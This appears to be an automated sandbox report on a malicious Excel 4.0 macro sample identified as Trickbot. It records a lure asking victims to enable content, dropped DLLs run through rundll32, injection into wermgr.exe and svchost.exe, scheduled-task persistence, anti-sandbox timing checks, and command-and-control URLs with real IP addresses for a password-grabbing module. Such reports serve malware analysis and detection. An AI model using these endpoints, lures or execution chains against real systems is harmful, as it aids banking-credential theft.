                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: wermgr.exe, 00000006.00000002.2362554842.00000000333A0000.00000004.00000001.sdmpString found in binary or memory: https://185.109.54.99:447/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/5/pwgrab64/
                Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/jvvnxhpdjrND3fPr33rZPHh
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/
                Source: wermgr.exe, 00000006.00000002.2357267628.0000000000340000.00000004.00000020.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/U
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/rznnTbpNFJV19x1x/o
                Source: wermgr.exe, 00000006.00000002.2362530513.000000003337E000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DEBG//e
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//
                Source: wermgr.exe, 00000006.00000002.2362547188.0000000033395000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//3
                Source: wermgr.exe, 00000006.00000002.2362536618.0000000033385000.00000004.00000001.sdmpString found in binary or memory: https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/64/pwgrab/DPST//W
                Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443

                E-Banking Fraud:

                barindex
                Yara detected TrickbotShow sources
                Source: Yara matchFile source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY

                System Summary:

                barindex
                Found malicious Excel 4.0 MacroShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsInitial sample: urlmon
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 15 " Once you have enabled editing, please click
                Source: Screenshot number: 4Screenshot OCR: Enable content button jl , ' ' "==~ " from the yellow bar above 1| 24 25 26 27 28 29 30
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above I \ , I ' /
                Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enable
                Source: Document image extraction number: 1Screenshot OCR: Enable content button from the yellow bar above j'
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B470 NtDelayExecution,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006F6B0 NtQueryInformationProcess,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0 NtQuerySystemInformation,DuplicateHandle,CLSIDFromString,CloseHandle,HeapFree,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00068010
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00082060
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007D0A0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BCA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00078CA0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E0F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061500
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000789B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00069200
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006C290
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000743C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077840
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00080870
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000644C0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000790E0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000714F0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076100
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00076D10
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00072580
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CA00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007BE20
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00077630
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007CE70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006A280
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006CEB0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00073B00
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007B700
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006E310
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00062720
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00075F70
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000763A8
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000717B0
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00110040
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180014030
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B5134
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A114C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A0200
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001F204
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800873D0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008C5F4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008B874
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018009AAF4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001EC6C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B4D04
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008BF24
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008E000
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180093044
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180086048
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800210A4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180003174
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180005190
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008C188
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800651D8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008E218
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008D22C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A9250
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180023258
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180001270
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180010298
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001C2A8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800022B0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180016340
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018002535C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018007B3A8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800123C4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008C3D0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B3420
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008E478
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800794B8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800054D4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A14D4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800034E0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018009150C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180063548
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800CB548
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800CA564
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018005D59C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800015A8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800935A4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A25D0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018007E5E0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180002614
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008E668
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001E6A4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B073C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180019748
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800CB7C0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B27E0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018000381C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800C5828
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008C844
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180060854
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800018EC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001B8F4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008E938
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180002958
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001897C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A99B0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800C49AC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800249B8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A3A2C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180032A2C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008BAFC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001DB00
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001DB04
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018001BB4C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180090B48
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180003B54
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008DBA4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018005CBF0
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180001C28
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180017C44
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800C1D10
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180097D1C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800ACD50
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800AEDB4
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180096DDC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800A1E2C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180091E50
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180004E50
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800BFE6C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018007DE68
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018008CE80
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_000000018006CEB8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180001F6C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000000180035F70
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800AFFA4
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: Joe Sandbox ViewDropped File: C:\Users\user\BASE.BABAA AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                Source: C:\Windows\System32\svchost.exeSection loaded: imagepop.dll
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@14/18@8/13
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00064C40 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B4E1C LookupPrivilegeValueA,AdjustTokenPrivileges,
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_00000001800B5134 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006376C CoCreateInstance,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D3DE0000Jump to behavior
                Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{20D2CF44-ED8C-5F48-68CE-BDAC24C4F6AF}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5FD.tmpJump to behavior
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\wermgr.exeSystem information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsVirustotal: Detection: 11%
                Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsReversingLabs: Detection: 27%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Windows\System32\wermgr.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
                Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor7737977537\rpBASEtx.rrd',DllRegisterServer
                Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00321BD0 push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00321C7A push dword ptr [edx+14h]; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00321CFD push dword ptr [edx+14h]; ret
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\BASE.BABAAJump to dropped file
                Source: C:\Windows\System32\wermgr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Found evasive API chain (trying to detect sleep duration tampering with parallel thread)Show sources
                Source: C:\Windows\System32\wermgr.exeFunction Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,handleClosed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\System32\wermgr.exeRDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F6EE4D30110h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F6EE4D27FA6h 0x00000048 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0006EAD0 rdtsc
                Source: C:\Windows\System32\wermgr.exeCode function: GetAdaptersInfo,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkesJump to dropped file
                Source: C:\Windows\System32\taskeng.exe TID: 1288Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1464Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 1464Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeLast function: Thread delayed
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_00061290 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\wermgr.exeCode function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW,
